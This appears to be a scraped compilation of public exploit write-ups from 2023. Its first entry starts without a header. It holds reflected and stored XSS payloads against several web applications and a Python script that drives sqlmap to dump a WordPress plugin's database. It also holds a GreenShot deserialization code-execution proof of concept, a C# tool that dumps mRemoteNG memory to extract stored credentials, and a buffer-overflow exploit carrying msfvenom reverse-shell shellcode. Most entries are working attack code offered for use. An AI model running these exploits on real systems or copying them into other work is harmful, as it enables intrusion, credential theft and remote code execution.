The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob


## Description

The attacker can send to victim a link containing a malicious URL in an email or instant message
can perform a wide variety of actions, such as stealing the victim's session token or login credentials



Path: /matchmakings/question

URL parameter is vulnerable to RXSS

https://website/matchmakings/questiontmili%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3ew71ch?number=
https://website/matchmakings/question[XSS]?number=


Path: /friends

URL parameter is vulnerable to RXSS

https://website/friendsslty3%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3er5c3m/ajax_invite?mode=model
https://website/friends[XSS]/ajax_invite?mode=model


Path: /friends/ajax_invite

URL parameter is vulnerable to RXSS

https://website/friends/ajax_invitej7hrg%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3ef26v4?mode=model
https://website/friends/ajax_invite[XSS]?mode=model

Path: /pages

URL parameter is vulnerable to RXSS

https://website/pagesi3efi%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3ebdk84/no-permission-role?access_token&=redirect_url=aHR0cHM6Ly9kZW1vLm1vb2RhdGluZ3NjcmlwdC5jb20vbWVldF9tZS9pbmRleC9tZWV0X21l
https://website/pages[XSS]/no-permission-role?access_token&=redirect_url=aHR0cHM6Ly9kZW1vLm1vb2RhdGluZ3NjcmlwdC5jb20vbWVldF9tZS9pbmRleC9tZWV0X21l

Path: /users

URL parameter is vulnerable to RXSS

https://website/userszzjpp%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3eaycfc/view/108?tab=activity
https://website/user[XSS]/view/108?tab=activity

Path: /users/view

URL parameter is vulnerable to RXSS

https://website/users/viewi1omd%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3el43yn/108?tab=activity
https://website/users/view[XSS]/108?tab=activity


Path: /find-a-match

URL parameter is vulnerable to RXSS

https://website/find-a-matchpksyk%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3es9a64?session_popularity=&interest=0&show_search_form=1&gender=2&from_age=18&to_age=45&country_id=1&state_id=5&city_id=&advanced=0
https://website/find-a-match[XSS]?session_popularity=&interest=0&show_search_form=1&gender=2&from_age=18&to_age=45&country_id=1&state_id=5&city_id=&advanced=0


[XSS Payload]: pksyk"><img src=a onerror=alert(1)>s9a6


[-] Done
HireHackking 
# Exploit Title: Perch v3.2 - Persistent Cross Site Scripting (XSS)
# Google Dork: N/A
# Date: 23-July-2023
# Exploit Author: Dinesh Mohanty
# Vendor Homepage: https://grabaperch.com/
# Software Link: https://grabaperch.com/download
# Version: v3.2
# Tested on: Windows
# CVE : Requested

# Description:
Stored Cross Site Scripting (Stored XSS) Vulnerability is found in the file upload functionally under the create asset section.

#Steps to Reproduce

User needs to login into the application and needs to follow below steps:

1. Login into the application
2. From the left side menu go to Assets (http://URL/perch/core/apps/assets/)
3. Click on "Add assets" and fill all other details (Please note not all the text fields are vulnerable to XSS as they have output encoding)
4. Create the SVG file with below contents say xss.svg
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert("XSS");
  </script>
</svg>

4. In the File upload section upload the above SVG file and submit
5. Now go to above SVG directly say the file is xss.svg
6. go to svg file (http://URL/perch/resources/xss.svg) or you can view all Assets and view the image
7. One can see that we got an XSS alert.
HireHackking 
# Exploit Title: Availability Booking Calendar v1.0 - Multiple Cross-site scripting (XSS)
# Date: 07/2023
# Exploit Author: Andrey Stoykov
# Tested on: Ubuntu 20.04
# Blog: http://msecureltd.blogspot.com


XSS #1:

Steps to Reproduce:

1. Browse to Bookings
2. Select All Bookings
3. Edit booking and select Promo Code
4. Enter payload TEST"><script>alert(`XSS`)</script>


// HTTP POST request

POST /AvailabilityBookingCalendarPHP/index.php?controller=GzBooking&action=edit HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
[...]

[...]
edit_booking=1&calendars_price=900&extra_price=0&tax=10&deposit=91&promo_code=TEST%22%3E%3Cscript%3Ealert%28%60XSS%60%29%3C%2Fscript%3E&discount=0&total=910&create_booking=1
[...]

// HTTP response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 205
[...]



// HTTP GET request to Bookings page

GET /AvailabilityBookingCalendarPHP/index.php?controller=GzBooking&action=edit&id=2 HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
[...]


// HTTP response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 33590
[...]

[...]
<label class="control-label" for="promo_code">Promo code:</label>
            <input id="promo_code" class="form-control input-sm" type="text" name="promo_code" size="25" value=TEST"><script>alert(`XSS`)</script>" title="Promo code" placeholder="">
        </div>
[...]



Unrestricted File Upload #1:


// SVG file contents

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(`XSS`);
   </script>
</svg>


Steps to Reproduce:

1. Browse My Account
2. Image Browse -> Upload
3. Then right click on image
4. Select Open Image in New Tab


// HTTP POST request

POST /AvailabilityBookingCalendarPHP/index.php?controller=GzUser&action=edit&id=1 HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
[...]

[...]
-----------------------------13831219578609189241212424546
Content-Disposition: form-data; name="img"; filename="xss.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(`XSS`);
   </script>
</svg>
[...]


// HTTP response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 190
[...]
HireHackking 
Exploit Title: Zomplog 3.9 - Cross-site scripting (XSS)
Application: Zomplog
Version: v3.9
Bugs:  XSS
Technology: PHP
Vendor URL: http://zomp.nl/zomplog/
Software Link: http://zomp.nl/zomplog/downloads/zomplog/zomplog3.9.zip
Date of found: 22.07.2023
Author: Mirabbas Ağalarov
Tested on: Linux 


2. Technical Details & POC
========================================
steps: 
1. Login to account
2. Add new page
3. Set as <img src=x onerror=alert(4)>
4. Go to menu

Poc request:

POST /zimplitcms/zimplit.php?action=copyhtml&file=index.html&newname=img_src=x_onerror=alert(5).html&title=%3Cimg%20src%3Dx%20onerror%3Dalert(5)%3E HTTP/1.1
Host: localhost
Content-Length: 11
sec-ch-ua: 
Accept: */*
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
sec-ch-ua-platform: ""
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/zimplitcms/zimplit.php?action=load&file=index.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ZsessionLang=en; ZsessionId=tns0pu8urk9nl78nivpm; ZeditorData=sidemenuStatus:open
Connection: close

empty=empty
HireHackking 
# Exploit Title: Joomla HikaShop 4.7.4 - Reflected XSS
# Exploit Author: CraCkEr
# Date: 24/07/2023
# Vendor: Hikari Software Team
# Vendor Homepage: https://www.hikashop.com/
# Software Link: https://demo.hikashop.com/index.php/en/
# Joomla Extension Link: https://extensions.joomla.org/extension/e-commerce/shopping-cart/hikashop/
# Version: 4.7.4
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site



## Greetings

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob



## Description

The attacker can send to victim a link containing a malicious URL in an email or instant message
can perform a wide variety of actions, such as stealing the victim's session token or login credentials



Path: /index.php

GET parameter 'from_option' is vulnerable to RXSS

https://website/index.php?option=com_hikashop&ctrl=product&task=filter&tmpl=raw&filter=1&module_id=102&cid=2&from_option=[XSS]&from_ctrl=product&from_task=listing&from_itemid=103


Path: /index.php

GET parameter 'from_ctrl' is vulnerable to RXSS

https://demo.hikashop.com/index.php?option=com_hikashop&ctrl=product&task=filter&tmpl=raw&filter=1&module_id=102&cid=2&from_option=com_hikashop&from_ctrl=[XSS]&from_task=listing&from_itemid=103


Path: /index.php

GET parameter 'from_task' is vulnerable to RXSS

https://demo.hikashop.com/index.php?option=com_hikashop&ctrl=product&task=filter&tmpl=raw&filter=1&module_id=102&cid=2&from_option=com_hikashop&from_ctrl=product&from_task=[XSS]&from_itemid=103


Path: /index.php

GET parameter 'from_itemid' is vulnerable to RXSS

https://demo.hikashop.com/index.php?option=com_hikashop&ctrl=product&task=filter&tmpl=raw&filter=1&module_id=102&cid=2&from_option=com_hikashop&from_ctrl=product&from_task=listing&from_itemid=[XSS]


[XSS Payload]: uhqum"onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"wcn46



[-] Done
HireHackking 
# Exploit Title: GreenShot  1.2.10 - Insecure Deserialization Arbitrary Code Execution
# Date: 26/07/2023
# Exploit Author: p4r4bellum
# Vendor Homepage: https://getgreenshot.org
# Software Link: https://getgreenshot.org/downloads/
# Version: 1.2.6.10
# Tested on: windows 10.0.19045 N/A build 19045
# CVE : CVE-2023-34634
#
# GreenShot 1.2.10 and below is vulnerable to an insecure object deserialization in its custom *.greenshot format
# A stream of .Net object is serialized and inscureley deserialized when a *.greenshot file is open with the software
# On a default install the *.greenshot file extension is associated with the programm, so double-click on a*.greenshot file
# will lead to arbitrary code execution
#
# Generate the payload. You need yserial.net to be installed on your machine. Grab it at https://github.com/pwntester/ysoserial.net
./ysoserial.exe -f BinaryFormatter -g WindowsIdentity  -c "calc" --outputpath payload.bin -o raw
#load the payload
$payload = Get-Content .\payload.bin -Encoding Byte
# retrieve the length of the payload
$length = $payload.Length
# load the required assembly to craft a PNG file
Add-Type -AssemblyName System.Drawing
# the following lines creates a png file with some text. Code borrowed from https://stackoverflow.com/questions/2067920/can-i-draw-create-an-image-with-a-given-text-with-powershell
$filename = "$home\poc.greenshot"
$bmp = new-object System.Drawing.Bitmap 250,61 
$font = new-object System.Drawing.Font Consolas,24 
$brushBg = [System.Drawing.Brushes]::Green 
$brushFg = [System.Drawing.Brushes]::Black 
$graphics = [System.Drawing.Graphics]::FromImage($bmp) 
$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height) 
$graphics.DrawString('POC Greenshot',$font,$brushFg,10,10) 
$graphics.Dispose() 
$bmp.Save($filename) 

# append the payload to the PNG file
$payload | Add-Content -Path $filename -Encoding Byte -NoNewline 
# append the length of the payload
[System.BitConverter]::GetBytes([long]$length) | Add-Content -Path $filename -Encoding  Byte -NoNewline
# append the signature
"Greenshot01.02" | Add-Content -path $filename -NoNewline -Encoding Ascii
# launch greenshot. Calc.exe should be executed
Invoke-Item  $filename
HireHackking 
#Exploit Title: October CMS v3.4.4 - Stored Cross-Site Scripting (XSS) (Authenticated)
#Date: 29 June 2023
#Exploit Author: Okan Kurtulus
#Vendor Homepage: https://octobercms.com
#Version: v3.4.4
#Tested on: Ubuntu 22.04
#CVE : N/A

# Proof of Concept:
1– Install the system through the website and log in with any user with file upload authority.
2– Select "Media" in the top menu. Prepare an SVG file using the payload below.
3– Upload the SVG file and call the relevant file from the directory it is in. XSS will be triggered.

#Stored XSS Payload:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert(1);
  </script>
</svg>
HireHackking 
# Exploit Title: Joomla VirtueMart Shopping-Cart 4.0.12 - Reflected XSS
# Exploit Author: CraCkEr
# Date: 24/07/2023
# Vendor: VirtueMart Team
# Vendor Homepage: https://www.virtuemart.net/
# Software Link: https://demo.virtuemart.net/
# Joomla Extension Link: https://extensions.joomla.org/extension/e-commerce/shopping-cart/virtuemart/
# Version: 4.0.12
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site



## Greetings

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob



## Description

The attacker can send to victim a link containing a malicious URL in an email or instant message
can perform a wide variety of actions, such as stealing the victim's session token or login credentials



Path: /product-variants

GET parameter 'keyword' is vulnerable to RXSS

https://website/product-variants?keyword=[XSS]&view=category&option=com_virtuemart&virtuemart_category_id=11&Itemid=925


[XSS Payload]: uk9ni"><script>alert(1)</script>a6di2



[-] Done
HireHackking 
#!/usr/bin/python3

# Exploit Title: WordPress Plugin AN_Gradebook <= 5.0.1 - Subscriber+ SQLi
# Date: 2023-07-26
# Exploit Author: Lukas Kinneberg
# Github: https://github.com/lukinneberg/CVE-2023-2636
# Vendor Homepage: https://wordpress.org/plugins/an-gradebook/
# Software Link: https://github.com/lukinneberg/CVE-2023-2636/blob/main/an-gradebook.7z
# Tested on: WordPress 6.2.2
# CVE: CVE-2023-2636


from datetime import datetime
import os
import requests
import json

# User Input:
target_ip = 'CHANGE_THIS'
target_port = '80'
username = 'hacker'
password = 'hacker'

banner = '''

 ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ 
||C |||V |||E |||- |||2 |||0 |||2 |||3 |||- |||2 |||6 |||3 |||6 ||
||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__||
|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|
		Exploit Author: Lukas Kinneberg

'''

print(banner)

print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))

# Authentication:
session = requests.Session()
auth_url = 'http://' + target_ip + ':' + target_port + '/wp-login.php'
check = session.get(auth_url)
# Header:
header = {
    'Host': target_ip,
    'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Origin': 'http://' + target_ip,
    'Connection': 'close',
    'Upgrade-Insecure-Requests': '1'
}

# Body:
body = {
    'log': username,
    'pwd': password,
    'wp-submit': 'Log In',
    'testcookie': '1'
}
auth = session.post(auth_url, headers=header, data=body)

# SQL-Injection (Exploit):
# Generate payload for sqlmap
cookies_session = session.cookies.get_dict()
cookie = json.dumps(cookies_session)
cookie = cookie.replace('"}','')
cookie = cookie.replace('{"', '')
cookie = cookie.replace('"', '')
cookie = cookie.replace(" ", '')
cookie = cookie.replace(":", '=')
cookie = cookie.replace(',', '; ')

print('[*] Payload for SQL-Injection:')

# Enter the URL path of the course after the target_port below
exploitcode_url = r'sqlmap -u "http://' + target_ip + ':' + target_port + r'/wp-admin/admin-ajax.php?action=course&id=3" '
exploitcode_risk = '--level 2 --risk 2 '
exploitcode_cookie = '--cookie="' + cookie + '" '


# SQLMAP Printout
print('    Sqlmap options:')
print('     -a, --all           Retrieve everything')
print('     -b, --banner        Retrieve DBMS banner')
print('     --current-user      Retrieve DBMS current user')
print('     --current-db        Retrieve DBMS current database')
print('     --passwords         Enumerate DBMS users password hashes')
print('     --tables            Enumerate DBMS database tables')
print('     --columns           Enumerate DBMS database table column')
print('     --schema            Enumerate DBMS schema')
print('     --dump              Dump DBMS database table entries')
print('     --dump-all          Dump all DBMS databases tables entries')
retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ')
exploitcode = exploitcode_url + exploitcode_risk + exploitcode_cookie + retrieve_mode + ' -p id -v 0 --answers="follow=Y" --batch'
os.system(exploitcode)
print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))
HireHackking 
# Exploit Title: copyparty v1.8.6 - Reflected Cross Site Scripting (XSS)
# Date: 23/07/2023
# Exploit Author: Vartamtezidis Theodoros (@TheHackyDog)
# Vendor Homepage: https://github.com/9001/copyparty/
# Software Link: https://github.com/9001/copyparty/releases/tag/v1.8.6
# Version: <=1.8.6
# Tested on: Debian Linux
# CVE : CVE-2023-38501



#Description
Copyparty is a portable file server. Versions prior to 1.8.6 are subject to a reflected cross-site scripting (XSS) Attack. 

Vulnerability that exists in the web interface of the application could allow an attacker to execute malicious javascript code by tricking users into accessing a malicious link.

#POC
https://localhost:3923/?k304=y%0D%0A%0D%0A%3Cimg+src%3Dcopyparty+onerror%3Dalert(1)%3E
HireHackking 
# Exploit Title: mRemoteNG v1.77.3.1784-NB - Cleartext Storage of Sensitive Information in Memory
# Google Dork: -
# Date: 21.07.2023
# Exploit Author: Maximilian Barz
# Vendor Homepage: https://mremoteng.org/
# Software Link: https://mremoteng.org/download
# Version: mRemoteNG <= v1.77.3.1784-NB
# Tested on: Windows 11
# CVE : CVE-2023-30367




/*
Multi-Remote Next Generation Connection Manager (mRemoteNG) is free software that enables users to
store and manage multi-protocol connection configurations to remotely connect to systems.

mRemoteNG configuration files can be stored in an encrypted state on disk. mRemoteNG version <= v1.76.20 and <= 1.77.3-dev
loads configuration files in plain text into memory (after decrypting them if necessary) at application start-up,
even if no connection has been established yet. This allows attackers to access contents of configuration files in plain text
through a memory dump and thus compromise user credentials when no custom password encryption key has been set.
This also bypasses the connection configuration file encryption setting by dumping already decrypted configurations from memory.
Full Exploit and mRemoteNG config file decryption + password bruteforce python script: https://github.com/S1lkys/CVE-2023-30367-mRemoteNG-password-dumper
*/


using System;
using System.Collections;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Text;
using System.Text.RegularExpressions;


namespace mRemoteNGDumper
{
public static class Program
{

public enum MINIDUMP_TYPE
{
MiniDumpWithFullMemory = 0x00000002
}

[StructLayout(LayoutKind.Sequential, Pack = 4)]
public struct MINIDUMP_EXCEPTION_INFORMATION
{
public uint ThreadId;
public IntPtr ExceptionPointers;
public int ClientPointers;
}

[DllImport("kernel32.dll")]
static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);

[DllImport("Dbghelp.dll")]
static extern bool MiniDumpWriteDump(IntPtr hProcess, uint ProcessId, SafeHandle hFile, MINIDUMP_TYPE DumpType, ref MINIDUMP_EXCEPTION_INFORMATION ExceptionParam, IntPtr UserStreamParam, IntPtr CallbackParam);


static void Main(string[] args)
{
string input;
bool configfound = false;
StringBuilder filesb;
StringBuilder linesb;
List<string> configs = new List<string>();

Process[] localByName = Process.GetProcessesByName("mRemoteNG");

if (localByName.Length == 0) {
Console.WriteLine("[-] No mRemoteNG process was found. Exiting");
System.Environment.Exit(1);
}
string assemblyPath = Assembly.GetEntryAssembly().Location;
Console.WriteLine("[+] Creating a memory dump of mRemoteNG using PID {0}.", localByName[0].Id);
string dumpFileName = assemblyPath + "_" + DateTime.Now.ToString("dd.MM.yyyy.HH.mm.ss") + ".dmp";
FileStream procdumpFileStream = File.Create(dumpFileName);
MINIDUMP_EXCEPTION_INFORMATION info = new MINIDUMP_EXCEPTION_INFORMATION();

// A full memory dump is necessary in the case of a managed application, other wise no information
// regarding the managed code will be available
MINIDUMP_TYPE DumpType = MINIDUMP_TYPE.MiniDumpWithFullMemory;
MiniDumpWriteDump(localByName[0].Handle, (uint)localByName[0].Id, procdumpFileStream.SafeFileHandle, DumpType, ref info, IntPtr.Zero, IntPtr.Zero);
procdumpFileStream.Close();

filesb = new StringBuilder();
Console.WriteLine("[+] Searching for configuration files in memory dump.");
using (StreamReader reader = new StreamReader(dumpFileName))
{
while (reader.Peek() >= 0)
{
input = reader.ReadLine();
string pattern = @"(\<Node)(.*)(?=\/>)\/>";
Match m = Regex.Match(input, pattern, RegexOptions.IgnoreCase);
if (m.Success)
{
configfound = true;

foreach (string config in m.Value.Split('>'))
{
configs.Add(config);
}
}

}

reader.Close();
if (configfound)
{
string currentDir = System.IO.Directory.GetCurrentDirectory();
string dumpdir = currentDir + "/dump";
if (!Directory.Exists(dumpdir))
{
Directory.CreateDirectory(dumpdir);
}

string savefilepath;
for (int i =0; i < configs.Count;i++)
{
if (!string.IsNullOrEmpty(configs[i]))
{
savefilepath = currentDir + "\\dump\\extracted_Configfile_mRemoteNG_" + i+"_" + DateTime.Now.ToString("dd.MM.yyyy.HH.mm") + "_confCons.xml";
Console.WriteLine("[+] Saving extracted configuration file to: " + savefilepath);
using (StreamWriter writer = new StreamWriter(savefilepath))
{
writer.Write(configs[i]+'>');
writer.Close();
}
}
}
Console.WriteLine("[+] Done!");
Console.WriteLine("[+] Deleting memorydump file!");
File.Delete(dumpFileName);
Console.WriteLine("[+] To decrypt mRemoteNG configuration files and get passwords in cleartext, execute: mremoteng_decrypt.py\r\n Example: python3 mremoteng_decrypt.py -rf \""+ currentDir + "\\dump\\extracted_Configfile_mRemoteNG_0_" + DateTime.Now.ToString("dd.MM.yyyy.HH.mm") + "_confCons.xml\"" );
}
else
{
Console.WriteLine("[-] No configuration file found in memorydump. Exiting");
Console.WriteLine("[+] Deleting memorydump file!");
File.Delete(dumpFileName);
}
}
}
}
}
HireHackking 
# Exploit Title: Joomla Solidres 2.13.3 - Reflected XSS
# Exploit Author: CraCkEr
# Date: 28/07/2023
# Vendor: Solidres Team
# Vendor Homepage: http://solidres.com/
# Software Link: https://extensions.joomla.org/extension/vertical-markets/booking-a-reservations/solidres/
# Demo: http://demo.solidres.com/joomla
# Version: 2.13.3
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site


## Greetings

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob


## Description

The attacker can send to victim a link containing a malicious URL in an email or instant message
can perform a wide variety of actions, such as stealing the victim's session token or login credentials


GET parameter 'show' is vulnerable to XSS
GET parameter 'reviews' is vulnerable to XSS
GET parameter 'type_id' is vulnerable to XSS
GET parameter 'distance' is vulnerable to XSS
GET parameter 'facilities' is vulnerable to XSS
GET parameter 'categories' is vulnerable to XSS
GET parameter 'prices' is vulnerable to XSS
GET parameter 'location' is vulnerable to XSS
GET parameter 'Itemid' is vulnerable to XSS


https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=d2tff&task=hub.search&ordering=score&direction=desc&type_id=0&show=[XSS]

https://website/joomla/greenery_hub/index.php?option=com_solidres&task=hub.updateFilter&location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&Itemid=306&a0b5056f4a0135d4f5296839591a088a=1distance=0-11&distance=0-11&reviews=[XSS]&facilities=18&

https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=d2tff&task=hub.search&ordering=score&direction=desc&type_id=[XSS]

https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&task=hub.search&Itemid=306&a0b5056f4a0135d4f5296839591a088a=1distance=0-11&distance=[XSS]&facilities=14

https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&task=hub.search&Itemid=306&a0b5056f4a0135d4f5296839591a088a=1distance=0-11&distance=0-11&facilities=[XSS]

https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&task=hub.search&Itemid=306&a0b5056f4a0135d4f5296839591a088a=1distance=0-25&distance=0-25&categories=[XSS]

https://website/joomla/greenery_hub/index.php?option=com_solidres&task=hub.updateFilter&location=d2tff&ordering=distance&direction=asc&prices=[XSS]

https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=[XSS]&task=hub.search&ordering=score&direction=desc&type_id=11

https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&task=hub.search&Itemid=[XSS]&a0b5056f4a0135d4f5296839591a088a=1distance=0-11&distance=0-11&facilities=14



[-] Done
HireHackking 
# Exploit Title: General Device Manager 2.5.2.2 - Buffer Overflow (SEH)
# Date: 30.07.2023
# Software Link: https://download.xm030.cn/d/MDAwMDA2NTQ=
# Software Link 2:
https://www.maxiguvenlik.com/uploads/importfiles/General_DeviceManager.zip
# Exploit Author: Ahmet Ümit BAYRAM
# Tested Version: 2.5.2.2
# Tested on: Windows 10 64bit

# 1.- Run python code : exploit.py
# 2.- Open pwned.txt and copy all content to clipboard
# 3.- Open Device Manage and press Add Device
# 4.- Paste the content of pwned.txt into the 'IP Address'
# 5.- Click 'OK'
# 6.- nc.exe local IP Port 1337 and you will have a bind shell
# 7.- R.I.P. Condor <3

import struct

offset = b"A" * 1308

nseh = b"\xEB\x06\x90\x90" # jmp short

seh = struct.pack('<I', 0x10081827) # 0x10081827 : pop ebx # pop esi # ret  | ascii {PAGE_EXECUTE_READ} [NetSDK.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.0.8.66 (C:\Program Files (x86)\DeviceManage\NetSDK.dll)


nops = b"\x90" * 32 

#shellcode: msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1  LPORT=1337 EXITFUNC=thread -a x86 --platform windows -b "\x00\x0a\x0d" -f python --var-name shellcode

shellcode =  b""
shellcode += b"\xd9\xc6\xbb\xae\xc7\xed\x8e\xd9\x74\x24\xf4"
shellcode += b"\x5a\x29\xc9\xb1\x52\x83\xea\xfc\x31\x5a\x13"
shellcode += b"\x03\xf4\xd4\x0f\x7b\xf4\x33\x4d\x84\x04\xc4"
shellcode += b"\x32\x0c\xe1\xf5\x72\x6a\x62\xa5\x42\xf8\x26"
shellcode += b"\x4a\x28\xac\xd2\xd9\x5c\x79\xd5\x6a\xea\x5f"
shellcode += b"\xd8\x6b\x47\xa3\x7b\xe8\x9a\xf0\x5b\xd1\x54"
shellcode += b"\x05\x9a\x16\x88\xe4\xce\xcf\xc6\x5b\xfe\x64"
shellcode += b"\x92\x67\x75\x36\x32\xe0\x6a\x8f\x35\xc1\x3d"
shellcode += b"\x9b\x6f\xc1\xbc\x48\x04\x48\xa6\x8d\x21\x02"
shellcode += b"\x5d\x65\xdd\x95\xb7\xb7\x1e\x39\xf6\x77\xed"
shellcode += b"\x43\x3f\xbf\x0e\x36\x49\xc3\xb3\x41\x8e\xb9"
shellcode += b"\x6f\xc7\x14\x19\xfb\x7f\xf0\x9b\x28\x19\x73"
shellcode += b"\x97\x85\x6d\xdb\xb4\x18\xa1\x50\xc0\x91\x44"
shellcode += b"\xb6\x40\xe1\x62\x12\x08\xb1\x0b\x03\xf4\x14"
shellcode += b"\x33\x53\x57\xc8\x91\x18\x7a\x1d\xa8\x43\x13"
shellcode += b"\xd2\x81\x7b\xe3\x7c\x91\x08\xd1\x23\x09\x86"
shellcode += b"\x59\xab\x97\x51\x9d\x86\x60\xcd\x60\x29\x91"
shellcode += b"\xc4\xa6\x7d\xc1\x7e\x0e\xfe\x8a\x7e\xaf\x2b"
shellcode += b"\x1c\x2e\x1f\x84\xdd\x9e\xdf\x74\xb6\xf4\xef"
shellcode += b"\xab\xa6\xf7\x25\xc4\x4d\x02\xae\x94\x91\x0c"
shellcode += b"\x2f\x03\x90\x0c\x2a\xea\x1d\xea\x5e\x1c\x48"
shellcode += b"\xa5\xf6\x85\xd1\x3d\x66\x49\xcc\x38\xa8\xc1"
shellcode += b"\xe3\xbd\x67\x22\x89\xad\x10\xc2\xc4\x8f\xb7"
shellcode += b"\xdd\xf2\xa7\x54\x4f\x99\x37\x12\x6c\x36\x60"
shellcode += b"\x73\x42\x4f\xe4\x69\xfd\xf9\x1a\x70\x9b\xc2"
shellcode += b"\x9e\xaf\x58\xcc\x1f\x3d\xe4\xea\x0f\xfb\xe5"
shellcode += b"\xb6\x7b\x53\xb0\x60\xd5\x15\x6a\xc3\x8f\xcf"
shellcode += b"\xc1\x8d\x47\x89\x29\x0e\x11\x96\x67\xf8\xfd"
shellcode += b"\x27\xde\xbd\x02\x87\xb6\x49\x7b\xf5\x26\xb5"
shellcode += b"\x56\xbd\x47\x54\x72\xc8\xef\xc1\x17\x71\x72"
shellcode += b"\xf2\xc2\xb6\x8b\x71\xe6\x46\x68\x69\x83\x43"
shellcode += b"\x34\x2d\x78\x3e\x25\xd8\x7e\xed\x46\xc9"


final_payload = offset + nseh + seh + nops + shellcode

# write the final payload to a file
try:
    with open('pwned.txt', 'wb') as f:
        print("[+] Creating %s bytes evil payload..." %len(final_payload))
        f.write(final_payload)
        f.close()
        print("[+] File created!")
except:
    print("File cannot be created!")
HireHackking 
